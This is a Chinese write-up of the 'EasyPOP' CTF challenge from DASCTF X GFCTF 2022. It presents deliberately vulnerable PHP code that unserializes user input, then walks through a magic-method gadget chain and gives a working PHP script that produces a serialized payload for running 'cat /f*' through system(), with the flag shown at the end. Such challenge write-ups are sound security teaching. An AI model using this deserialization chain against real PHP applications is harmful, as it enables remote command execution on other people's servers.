[DASCTF X GFCTF 2022十月挑战赛!]EasyPOP WP

php 复制代码
<?php
highlight_file(__FILE__);
error_reporting(0);

class fine
{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __invoke()
    {
        call_user_func($this->cmd, $this->content);
    }

    public function __wakeup()
    {
        $this->cmd = "";
        die("Go listen to Jay Chou's secret-code! Really nice");
    }
}

class show
{
    public $ctf;
    public $time = "Two and a half years";

    public function __construct($ctf)
    {
        $this->ctf = $ctf;
    }


    public function __toString()
    {
        return $this->ctf->show();
    }

    public function show(): string
    {
        return $this->ctf . ": Duration of practice: " . $this->time;
    }


}

class sorry
{
    private $name;
    private $password;
    public $hint = "hint is depend on you";
    public $key;

    public function __construct($name, $password)
    {
        $this->name = $name;
        $this->password = $password;
    }

    public function __sleep()
    {
        $this->hint = new secret_code();
    }

    public function __get($name)
    {
        $name = $this->key;
        $name();
    }


    public function __destruct()
    {
        if ($this->password == $this->name) {

            echo $this->hint;
        } else if ($this->name = "jay") {
            secret_code::secret();
        } else {
            echo "This is our code";
        }
    }


    public function getPassword()
    {
        return $this->password;
    }

    public function setPassword($password): void
    {
        $this->password = $password;
    }


}

class secret_code
{
    protected $code;

    public static function secret()
    {
        include_once "hint.php";
        hint();
    }

    public function __call($name, $arguments)
    {
        $num = $name;
        $this->$num();
    }

    private function show()
    {
        return $this->code->secret;
    }
}


if (isset($_GET['pop'])) {
    $a = unserialize($_GET['pop']);
    $a->setPassword(md5(mt_rand()));
} else {
    $a = new show("Ctfer");
    echo $a->show();
}
Ctfer: Duration of practice: Two and a half years

入口:pop参数传入序列化数据

出口:fine::__invoke()里的call_user_func用来执行系统命令,查看flag

利用顺序:

1.sorry::setPassword,给password赋值随机数

2.sorry::__destruct,如果name和password不相等,会调用secret_code::secret(),进而include_once "hint.php"。但是只会跳转到听歌界面,没有flag。
使用name=&password,让两者值恒等,绕过随机赋值。

3.echo $this->hint,将hint当作字符串调用。hint为show类,进入show::__toString

4.return $this->ctf->show(),ctf为secret_code类,调用secret_code::show()

5.return $this->code->secret,调用不存在的属性,code为sorry类,进入sorry::__get()

6.key赋值name,以函数调用name。key为fine类,进入fine:__invoke()

7.cmd,content分别赋值'system', 'cat /f*'

8.为了绕过fine::__wakeup,修改序列化数据(具体上网查)

payload:

构造序列化数据时可以把数据都改为public,方便操作

php 复制代码
<?php
class fine
{
    public $cmd;
    public $content;
}

class show
{
    public $ctf;
}

class sorry
{
    public $name;
    public $password;
    public $hint;
    public $key;
}

class secret_code
{
    public $code;
}

$pop=new sorry();
$pop->name=&$pop->password;
$pop->hint=new show();
$pop->hint->ctf=new secret_code();
$pop->hint->ctf->code=new sorry();
$pop->hint->ctf->code->key=new fine();
$pop->hint->ctf->code->key->cmd='system';
$pop->hint->ctf->code->key->content='cat /f*';
echo urlencode(serialize($pop));
?>

flag{2766a0c2-44c1-4547-b0b9-4cfa91609a3c}

难点:call_user_func('system', 'cat /f*');
call_user_func('system', 'ls');可以执行系统命令

相关推荐
hikktn7 小时前
如何在 Rust 中实现内存安全:与 C/C++ 的对比分析
c语言·安全·rust
龙哥·三年风水8 小时前
群控系统服务端开发模式-应用开发-个人资料
分布式·php·群控系统
23zhgjx-NanKon9 小时前
华为eNSP:QinQ
网络·安全·华为
23zhgjx-NanKon9 小时前
华为eNSP:mux-vlan
网络·安全·华为
昔我往昔9 小时前
阿里云文本内容安全处理
安全·阿里云·云计算
Lionhacker9 小时前
网络工程师这个行业可以一直干到退休吗?
网络·数据库·网络安全·黑客·黑客技术
帅得不敢出门10 小时前
安卓设备adb执行AT指令控制电话卡
android·adb·sim卡·at指令·电话卡
centos0811 小时前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
网络安全·二进制·pwn·ctf
棱角~~11 小时前
盘点和嗨格式一样好用的10款数据恢复!!
数据库·经验分享·安全·电脑·学习方法
我又来搬代码了12 小时前
【Android】使用productFlavors构建多个变体
android